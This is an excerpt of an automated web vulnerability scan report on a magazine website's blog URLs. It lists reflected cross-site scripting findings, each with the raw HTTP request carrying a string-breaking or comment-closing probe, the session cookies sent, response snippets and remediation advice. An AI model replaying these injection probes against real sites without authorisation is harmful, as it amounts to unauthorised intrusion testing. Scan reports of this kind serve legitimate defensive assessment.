This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/11/it-saddens-me-to-think.htmla5e13'%3bec9601eadeb HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:01 GMT Date: Mon, 29 Nov 2010 16:50:01 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77405
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/11/it-saddens-me-to-think.htmla5e13';ec9601eadeb', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 85f94-->544613232cd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/11/it-saddens-me-to-think.html85f94-->544613232cd HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:03 GMT Date: Mon, 29 Nov 2010 16:50:03 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload 62c06-->504ead418a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/201062c06-->504ead418a4/11/the-everyday-poetry-of-married-life.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:11 GMT Date: Mon, 29 Nov 2010 16:50:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80462
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dddfe'%3b22b93f180db was submitted in the REST URL parameter 3. This input was echoed as dddfe';22b93f180db in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010dddfe'%3b22b93f180db/11/the-everyday-poetry-of-married-life.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:08 GMT Date: Mon, 29 Nov 2010 16:50:08 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010dddfe';22b93f180db/11/the-everyday-poetry-of-married-life.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular d ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 88126-->8d41650cb0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/1188126-->8d41650cb0/the-everyday-poetry-of-married-life.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:25 GMT Date: Mon, 29 Nov 2010 16:50:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80455
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... e bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[1388339606]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/1188126-->8d41650cb0/the-everyday-poetry-of-married-life.html?proxyuri=online%2Fwolcott%2F2010%2F1188126--%3E8d41650cb0%2Fthe-everyday-poetry-of-married-life.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b6f86'%3b66964d221cb was submitted in the REST URL parameter 4. This input was echoed as b6f86';66964d221cb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/11b6f86'%3b66964d221cb/the-everyday-poetry-of-married-life.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:22 GMT Date: Mon, 29 Nov 2010 16:50:22 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77420
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/11b6f86';66964d221cb/the-everyday-poetry-of-married-life.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dial ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da196'%3b8d1c84dd76 was submitted in the REST URL parameter 5. This input was echoed as da196';8d1c84dd76 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/11/the-everyday-poetry-of-married-life.htmlda196'%3b8d1c84dd76 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:34 GMT Date: Mon, 29 Nov 2010 16:50:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77417
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/11/the-everyday-poetry-of-married-life.htmlda196';8d1c84dd76', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.", keywords : "Vanity ...[SNIP]...
The value of REST URL parameter 5 is copied into an HTML comment. The payload 2955d-->a4daf63d781 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/11/the-everyday-poetry-of-married-life.html2955d-->a4daf63d781 HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:35 GMT Date: Mon, 29 Nov 2010 16:50:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80464
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 3 is copied into an HTML comment. The payload eadf6-->8d3012b5ea4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010eadf6-->8d3012b5ea4/11/trust-but-verify-a-talking.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:13 GMT Date: Mon, 29 Nov 2010 16:50:13 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[299398869]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010eadf6-->8d3012b5ea4/11/trust-but-verify-a-talking.html?proxyuri=online%2Fwolcott%2F2010eadf6--%3E8d3012b5ea4%2F11%2Ftrust-but-verify-a-talking.html': escaped absolute path not valid. -> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b5b9'%3bc4bad56047d was submitted in the REST URL parameter 3. This input was echoed as 8b5b9';c4bad56047d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/20108b5b9'%3bc4bad56047d/11/trust-but-verify-a-talking.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:11 GMT Date: Mon, 29 Nov 2010 16:50:11 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77411
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/20108b5b9';c4bad56047d/11/trust-but-verify-a-talking.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue g ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36d44'%3bbc5f56bd128 was submitted in the REST URL parameter 4. This input was echoed as 36d44';bc5f56bd128 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /online/wolcott/2010/1136d44'%3bbc5f56bd128/trust-but-verify-a-talking.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:25 GMT Date: Mon, 29 Nov 2010 16:50:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 77409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... <script type="text/javascript"> CN.config.set({ title : document.title, url : 'http://www.vanityfair.com/online/wolcott/2010/1136d44';bc5f56bd128/trust-but-verify-a-talking.html', description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue glob ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload f7d43-->7c5b1a9ad55 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/wolcott/2010/11f7d43-->7c5b1a9ad55/trust-but-verify-a-talking.html HTTP/1.1 Host: www.vanityfair.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;
Response
HTTP/1.1 500 Internal Server Error Server: Resin/3.1.6 Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Mon, 29 Nov 2010 17:00:26 GMT Date: Mon, 29 Nov 2010 16:50:26 GMT Connection: close Connection: Transfer-Encoding Content-Length: 80363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/19 ...[SNIP]... se bug: com.amg.condenet.commons.exceptions.ApplicationBug: -:[225982422]:- Thread id: 39. Cause: java.lang.IllegalArgumentException. Msg: Invalid uri 'http://blog.vanityfair.com/online/wolcott/2010/11f7d43-->7c5b1a9ad55/trust-but-verify-a-talking.html?proxyuri=online%2Fwolcott%2F2010%2F11f7d43--%3E7c5b1a9ad55%2Ftrust-but-verify-a-talking.html': escaped absolute path not valid. -> ...[SNIP]...
